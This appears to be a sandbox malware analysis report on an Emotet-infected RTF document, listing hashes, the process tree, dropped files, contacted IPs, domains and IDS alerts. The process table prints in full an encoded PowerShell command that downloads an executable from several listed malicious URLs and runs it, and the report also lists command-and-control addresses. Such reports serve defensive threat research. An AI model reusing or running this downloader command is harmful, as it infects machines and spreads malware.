File name: | 7fc9d667d93145a726de.zip |
Full analysis: | https://app.any.run/tasks/9fc22f3e-aa51-445d-b0b7-1952b1da5651 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 15:26:56 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 02F93512E707CB86ED027FAFEED2F5E6 |
SHA1: | 00BBBE060C33FEC9AFC2B915CE4E7800B4C761E5 |
SHA256: | E3B86E4B26E65FC6F8EA29EDFAC3F88790FD578F0A0D4FF62293E7251C291BF1 |
SSDEEP: | 3072:0Hvn9W90aPKyZUj8oCPJBXOZjQ5uCGSNKYnE3875pfOQI2xcnrp7uK/VgdTKsTBe:Kvn0vKq1oMe1Q7GSNtEM7Lfzxcj9gdT0 |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 788 |
---|---|
ZipBitFlag: | 0x0001 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:09:18 15:26:10 |
ZipCRC: | 0xa81cb7f9 |
ZipCompressedSize: | 148624 |
ZipUncompressedSize: | 272640 |
ZipFileName: | 7fc9d667d93145a726ded6603cf1158362125eb5152db3f00596d182f3dd3a3c.bin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3544 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\7fc9d667d93145a726de.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3228 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\7fc9d667d93145a726ded6603cf1158362125eb5152db3f00596d182f3dd3a3c.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3040 | powershell -encod JABEAEkAaQBNAE0AdwBkAFAAPQAnAHAAdwA3ADkAVQBWADUATgAnADsAJAByADgAOQBCAHEAdgA5AE0AIAA9ACAAJwA1ADIAMwAnADsAJAB6ADEAbwBaAGkARABqAD0AJwBPAGwAXwBxAG0ARQBDACcAOwAkAEwAagA2AEoAbABMAEgAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcgA4ADkAQgBxAHYAOQBNACsAJwAuAGUAeABlACcAOwAkAHEAdAA0AEUAbgA2AEQAQgA9ACcAUgAzAHYAcQBpAFMARgBUACcAOwAkAEMAaQBJAEwAawBIAFUAbwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAYgBDAEwASQBFAE4AdAA7ACQAcQBXAEcAXwBqAHoAWgBWAD0AJwBoAHQAdABwADoALwAvAHMAaABhAGUAbAAuAG8AcgBnAC8AaABvAHMAdABpAG4AZwAvAFQAWQBYAGMAaABjAEsAawBIAHoALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBsAG8AdAB0AGkAegB6AGEAegBpAG8AbgBlAHMAYQB2AGEAcgByAGEALgBpAHQALwB3AHAALQBhAGQAbQBpAG4ALwB6AE0AaQBmAFoARABQAHUAcgAvAEAAaAB0AHQAcABzADoALwAvAGgAZQByAHIAZQBuAG0AbwBkAGUALgB0AGsALwA1AHUAcwBxAGoAbABlAHcALwB0AHQAZwAyADIAegBjAGYAXwBxADUAYwBoAG8AdgAtADMANwA3ADIAMQA1AC8AQABoAHQAdABwADoALwAvAG4AZgBiAGkAbwAuAGMAbwBtAC8AaQBtAGcALwB1AHAAbABvAGEAZABfAEkAbQBhAGcAZQAvAGUAZABtAC8AcABpAGMAXwAyAC8AdQA2AHEANAB1AGMAcQA3AF8AaAB5AGcAOAB1AHoAaABoAC0AMwA2ADkAOQA2ADMANQA1ADkALwBAAGgAdAB0AHAAOgAvAC8AZQBuAGQAbwBmAGgAaQBzAHIAbwBwAGUALgBuAGUAdAAvADIAMAAwADgALQAwADgAXwBQAFMAQgBlAGEAcgBEAG8AbgBhAHQAZQAvAHEAbQBpAHUATwBaAHYARABqAC8AJwAuACIAUwBwAGAATABpAFQAIgAoACcAQAAnACkAOwAkAGwAdAA1AHIARQBwAE0AegA9ACcATgBUAE0AUABzAEYAaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQBrAE8AWgBQAHoAVwAgAGkAbgAgACQAcQBXAEcAXwBqAHoAWgBWACkAewB0AHIAeQB7ACQAQwBpAEkATABrAEgAVQBvAC4AIgBkAE8AYAB3AGAATgBsAGAAbwBBAGQAZgBpAGwAZQAiACgAJABBAGsATwBaAFAAegBXACwAIAAkAEwAagA2AEoAbABMAEgAegApADsAJABsAFcAZABEADQATwA9ACcAdgBiAFgAaAB3AE0ANgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEwAagA2AEoAbABMAEgAegApAC4AIgBMAGAAZQBOAGcAVABIACIAIAAtAGcAZQAgADIANAA4ADEANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJABMAGoANgBKAGwATABIAHoAKQA7ACQASwBfADAAdABRAHcAbwBiAD0AJwBhADkAZAB2AEsARwBHAGIAJwA7AGIAcgBlAGEAawA7ACQAQgBjAFIASABSAFYANAA9ACcARgBTAEEAbQBSAFYANgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAHIAWgBjAE4ASAA9ACcAdwBuAFcAcQBGAGQAXwBhACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3336 | "C:\Users\admin\523.exe" | C:\Users\admin\523.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2572 | "C:\Users\admin\523.exe" | C:\Users\admin\523.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2660 | --d05e77b4 | C:\Users\admin\523.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3524 | --d05e77b4 | C:\Users\admin\523.exe | 523.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1132 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3832 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3908 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3544 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3544.44410\7fc9d667d93145a726ded6603cf1158362125eb5152db3f00596d182f3dd3a3c.bin | — | |
MD5:— | SHA256:— | |||
3228 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR1126.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3228 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC0DB8CC.wmf | wmf | |
MD5:471CAE0A8DBA69FE95345531EF1B0ECA | SHA256:BEFDF361E8F16DA86351089B70243C643C3ED649D077433F861917E55C0AAB83 | |||
3228 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E238A58E.wmf | wmf | |
MD5:D380A71A1B03203B26489F70EB320A64 | SHA256:DD06DE5BAC74F5593922EC5CF92F079655914BED2F2F755F1C91FD8324F6FA2E | |||
3228 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:64ACC42DAE6263A8CD90149E1F478CD9 | SHA256:9F349BD46627D00F3510892ED7992CA4BA765AC5A0B65A9B7C391B5257707C89 | |||
3228 | WINWORD.EXE | C:\Users\admin\Desktop\~$c9d667d93145a726ded6603cf1158362125eb5152db3f00596d182f3dd3a3c.rtf | pgc | |
MD5:9926DDF83F763B82C5F809871D9AEF03 | SHA256:923CF16F41EF4AE4B189C0289A4A4FC1B7DD9776A9DE6BEDC1417624E4272512 | |||
3228 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:1411C5AC7CB5904CAF3FB9623E3B38D6 | SHA256:0CAA76A6781CA740A9F4D1A715F9EF07D4EEBCD1F38C0E87219A22DC44093F86 | |||
3228 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:FE5518FB557C82325D55D619EA9E645E | SHA256:0693EC0166205AE8069F572B9EF3252CB7B29E24B6204F1E25A5D3BA45989749 | |||
3228 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E6E9F55.wmf | wmf | |
MD5:3F88C0B54BF2695896916D49A99233EC | SHA256:B2A537443977561979E19EAC9074421824008C287B2F01AF47A79E72335AA724 | |||
3228 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\403FAA5D.wmf | wmf | |
MD5:BA2D6BD46C90B2289E463FC0BB790DBB | SHA256:DCF519D8EAD86232CD5DDA6A019F91E1C9BF08BB2354153E60ADC631B9262312 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2880 | easywindow.exe | POST | — | 59.152.93.46:443 | http://59.152.93.46:443/entries/site/ | BD | — | — | malicious |
3040 | powershell.exe | GET | 200 | 156.67.209.58:80 | http://shael.org/cgi-sys/suspendedpage.cgi | SG | html | 7.40 Kb | malicious |
2880 | easywindow.exe | POST | — | 91.92.191.134:8080 | http://91.92.191.134:8080/ringin/ | IR | — | — | malicious |
2880 | easywindow.exe | POST | 200 | 178.254.6.27:7080 | http://178.254.6.27:7080/health/symbols/nsip/merge/ | DE | binary | 148 b | malicious |
3040 | powershell.exe | GET | 302 | 156.67.209.58:80 | http://shael.org/hosting/TYXchcKkHz/ | SG | html | 681 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3040 | powershell.exe | 156.67.209.58:80 | shael.org | Hostinger International Limited | SG | unknown |
2880 | easywindow.exe | 185.129.92.210:7080 | — | Bravo Online Systems LLC | AZ | malicious |
2880 | easywindow.exe | 91.92.191.134:8080 | — | Information Technology Company (ITC) | IR | malicious |
2880 | easywindow.exe | 178.254.6.27:7080 | — | EVANZO e-commerce GmbH | DE | malicious |
3040 | powershell.exe | 89.46.105.48:80 | www.lottizzazionesavarra.it | Aruba S.p.A. | IT | suspicious |
2880 | easywindow.exe | 59.152.93.46:443 | — | Zipnet Limited DKB AS number | BD | malicious |
Domain | IP | Reputation |
---|---|---|
shael.org |
| malicious |
www.lottizzazionesavarra.it |
| suspicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3040 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3040 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
3040 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3040 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2880 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2880 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2880 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2880 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
2880 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |